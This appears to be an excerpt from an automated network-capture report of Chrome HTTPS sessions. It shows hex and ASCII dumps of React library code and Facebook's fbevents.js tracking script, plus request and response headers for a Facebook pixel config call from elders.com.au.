                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 61 72 67 73 5b 5f 6b 65 79 20 2d 20 31 5d 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 5f 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 72 69 6e 74 57 61 72 6e 69 6e 67 28 27 77 61 72 6e 27 2c 20 66 6f 72 6d 61 74 2c 20 61 72 67 73 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 65 72 72 6f 72 28 66 6f 72 6d 61 74 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 5f 6c 65 6e 32 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 20 61 72 67 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 5f 6c 65 6e 32 20 3e 20 31 20 3f 20 5f 6c 65 6e 32 20 2d 20 31 20 3a 20 30 29 2c 20 5f 6b 65 79 32 20 3d 20 31 3b 20 5f 6b 65 79 32 20 3c 20
                                                                                                                                    Data Ascii: args[_key - 1] = arguments[_key]; } printWarning('warn', format, args); } } } function error(format) { { { for (var _len2 = arguments.length, args = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 <
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 61 74 65 46 6f 72 55 6e 6d 6f 75 6e 74 65 64 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 7b 7d 3b 0a 0a 20 20 66 75 6e 63 74 69 6f 6e 20 77 61 72 6e 4e 6f 6f 70 28 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2c 20 63 61 6c 6c 65 72 4e 61 6d 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 76 61 72 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 3d 20 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 20 3d 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 26 26 20 28 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 64 69 73 70 6c 61 79 4e 61 6d 65 20 7c 7c 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 20 7c 7c 20 27 52 65 61 63 74 43 6c 61 73 73 27 3b 0a 20 20 20 20 20 20 76
                                                                                                                                    Data Ascii: ateForUnmountedComponent = {}; function warnNoop(publicInstance, callerName) { { var _constructor = publicInstance.constructor; var componentName = _constructor && (_constructor.displayName || _constructor.name) || 'ReactClass'; v
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 73 20 77 68 65 6e 20 79 6f 75 20 6b 6e 6f 77 20 74 68 61 74 20 73 6f 6d 65 20 64 65 65 70 65 72 20 61 73 70 65 63 74 20 6f 66 20 74 68 65 0a 20 20 20 20 20 2a 20 63 6f 6d 70 6f 6e 65 6e 74 27 73 20 73 74 61 74 65 20 68 61 73 20 63 68 61 6e 67 65 64 20 62 75 74 20 60 73 65 74 53 74 61 74 65 60 20 77 61 73 20 6e 6f 74 20 63 61 6c 6c 65 64 2e 0a 20 20 20 20 20 2a 0a 20 20 20 20 20 2a 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 69 6e 76 6f 6b 65 20 60 73 68 6f 75 6c 64 43 6f 6d 70 6f 6e 65 6e 74 55 70 64 61 74 65 60 2c 20 62 75 74 20 69 74 20 77 69 6c 6c 20 69 6e 76 6f 6b 65 0a 20 20 20 20 20 2a 20 60 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 70 64 61 74 65 60 20 61 6e 64 20 60 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 60 2e 0a 20 20 20 20 20 2a
                                                                                                                                    Data Ascii: s when you know that some deeper aspect of the * component's state has changed but `setState` was not called. * * This will not invoke `shouldComponentUpdate`, but it will invoke * `componentWillUpdate` and `componentDidUpdate`. *
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 63 49 6e 73 74 61 6e 63 65 2c 20 27 72 65 70 6c 61 63 65 53 74 61 74 65 27 29 3b 0a 20 20 20 20 7d 2c 0a 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 53 65 74 73 20 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 54 68 69 73 20 6f 6e 6c 79 20 65 78 69 73 74 73 20 62 65 63 61 75 73 65 20 5f 70 65 6e 64 69 6e 67 53 74 61 74 65 20 69 73 0a 20 20 20 20 20 2a 20 69 6e 74 65 72 6e 61 6c 2e 20 54 68 69 73 20 70 72 6f 76 69 64 65 73 20 61 20 6d 65 72 67 69 6e 67 20 73 74 72 61 74 65 67 79 20 74 68 61 74 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 64 65 65 70 0a 20 20 20 20 20 2a 20 70 72 6f 70 65 72 74 69 65 73 20 77 68 69 63 68 20 69 73 20 63 6f 6e 66 75 73 69 6e 67 2e 20 54 4f 44 4f 3a 20 45 78 70 6f 73 65 20 70 65 6e
                                                                                                                                    Data Ascii: cInstance, 'replaceState'); }, /** * Sets a subset of the state. This only exists because _pendingState is * internal. This provides a merging strategy that is not available to deep * properties which is confusing. TODO: Expose pen
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 41 6c 77 61 79 73 20 75 73 65 20 74 68 69 73 20 74 6f 20 6d 75 74 61 74 65 0a 20 20 20 2a 20 73 74 61 74 65 2e 20 59 6f 75 20 73 68 6f 75 6c 64 20 74 72 65 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 73 20 69 6d 6d 75 74 61 62 6c 65 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 54 68 65 72 65 20 69 73 20 6e 6f 20 67 75 61 72 61 6e 74 65 65 20 74 68 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 77 69 6c 6c 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 79 20 75 70 64 61 74 65 64 2c 20 73 6f 0a 20 20 20 2a 20 61 63 63 65 73 73 69 6e 67 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 66 74 65 72 20 63 61 6c 6c 69 6e 67 20 74 68 69 73 20 6d 65 74 68 6f 64 20 6d 61 79 20 72 65 74 75 72 6e 20 74 68 65 20
                                                                                                                                    Data Ascii: subset of the state. Always use this to mutate * state. You should treat `this.state` as immutable. * * There is no guarantee that `this.state` will be immediately updated, so * accessing `this.state` after calling this method may return the
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 29 20 7b 0a 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 73 65 74 53 74 61 74 65 28 2e 2e 2e 29 3a 20 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 27 20 2b 20 27 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 27 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 28 74 68 69 73 2c 20 70 61 72 74 69 61 6c 53 74 61 74 65 2c 20 63 61 6c 6c 62 61 63 6b 2c 20 27 73 65 74 53 74 61 74 65 27 29 3b 0a 20 20 7d 3b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 46 6f 72
                                                                                                                                    Data Ascii: ) { throw new Error('setState(...): takes an object of state variables to update or a ' + 'function which returns an object of state variables.'); } this.updater.enqueueSetState(this, partialState, callback, 'setState'); }; /** * For


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    111192.168.2.449885157.240.253.14435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC361OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                    Host: connect.facebook.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:24 UTC1452INHTTP/1.1 200 OK
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                    report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                    content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-LV1wEhnI' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                    document-policy: force-load-at-top
                                                                                                                                    2024-11-05 08:03:24 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                    Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                    2024-11-05 08:03:24 UTC1INData Raw: 2f
                                                                                                                                    Data Ascii: /
                                                                                                                                    2024-11-05 08:03:24 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                    Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65
                                                                                                                                    Data Ascii: &c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="object")return null;a=a.extractor_config;if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="obje
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f 72 63 65 3b 61 3d 62 2e 61 72 72 61 79 4f 66 28 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 61 6c 6c 6f 63 61 74 69 6f 6e 3a 62 2e 6e 75 6d 62 65 72 28 29 2c 63 6f 64 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 6e 61 6d 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 70 61 73 73 52 61 74 65 3a 62 2e 6e 75 6d 62 65 72 28 29 7d 29 29 3b 6b 2e 65 78 70 6f 72 74 73 3d 61 7d 29 28
                                                                                                                                    Data Ascii: r k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enforce;a=b.arrayOf(b.objectWithFields({allocation:b.number(),code:b.string(),name:b.string(),passRate:b.number()}));k.exports=a})(
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 67 3a 6e 75 6c 6c 3b 67 3d 7b 7d 3b 68 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 68 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64
                                                                                                                                    Data Ascii: es("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!=null&&typeof g==="string"?g:null;g={};h!=null&&(typeof h==="undefined"?"und
                                                                                                                                    2024-11-05 08:03:24 UTC1703INData Raw: 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f
                                                                                                                                    Data Ascii: l}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Object.prototype.hasOwnProperty.call(e,a)?e[a]:a}function q(a){return Object.pro
                                                                                                                                    2024-11-05 08:03:25 UTC14681INData Raw: 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 3f 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 5b 61 5d 3a 6e 75 6c 6c 7d 29
                                                                                                                                    Data Ascii: tsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEncodings.map!=null&&a in c.moduleEncodings.map?c.moduleEncodings.map[a]:null})
                                                                                                                                    2024-11-05 08:03:25 UTC16384INData Raw: 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 76 65 6e 74 73 22 29 3b 76 61 72 20 6c 3d 62 2e 66 69 72 65 64 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 76
                                                                                                                                    Data Ascii: dules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j=f.getFbeventsModules("signalsFBEventsSendXHR");b=f.getFbeventsModules("SignalsFBEventsEvents");var l=b.fired;function m(a,b){v
                                                                                                                                    2024-11-05 08:03:25 UTC16384INData Raw: 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                    Data Ascii: ay(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&typeof a!=="string"||Array.isArray(a)||a==null)throw new g();return a}}function t(){return function(a){if(typeof a!=="function"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    112192.168.2.449886157.240.253.14435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC1372OUTGET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                    Host: connect.facebook.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:24 UTC1452INHTTP/1.1 200 OK
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                    report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                    content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-Ag7HnGcM' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                    document-policy: force-load-at-top
                                                                                                                                    2024-11-05 08:03:24 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
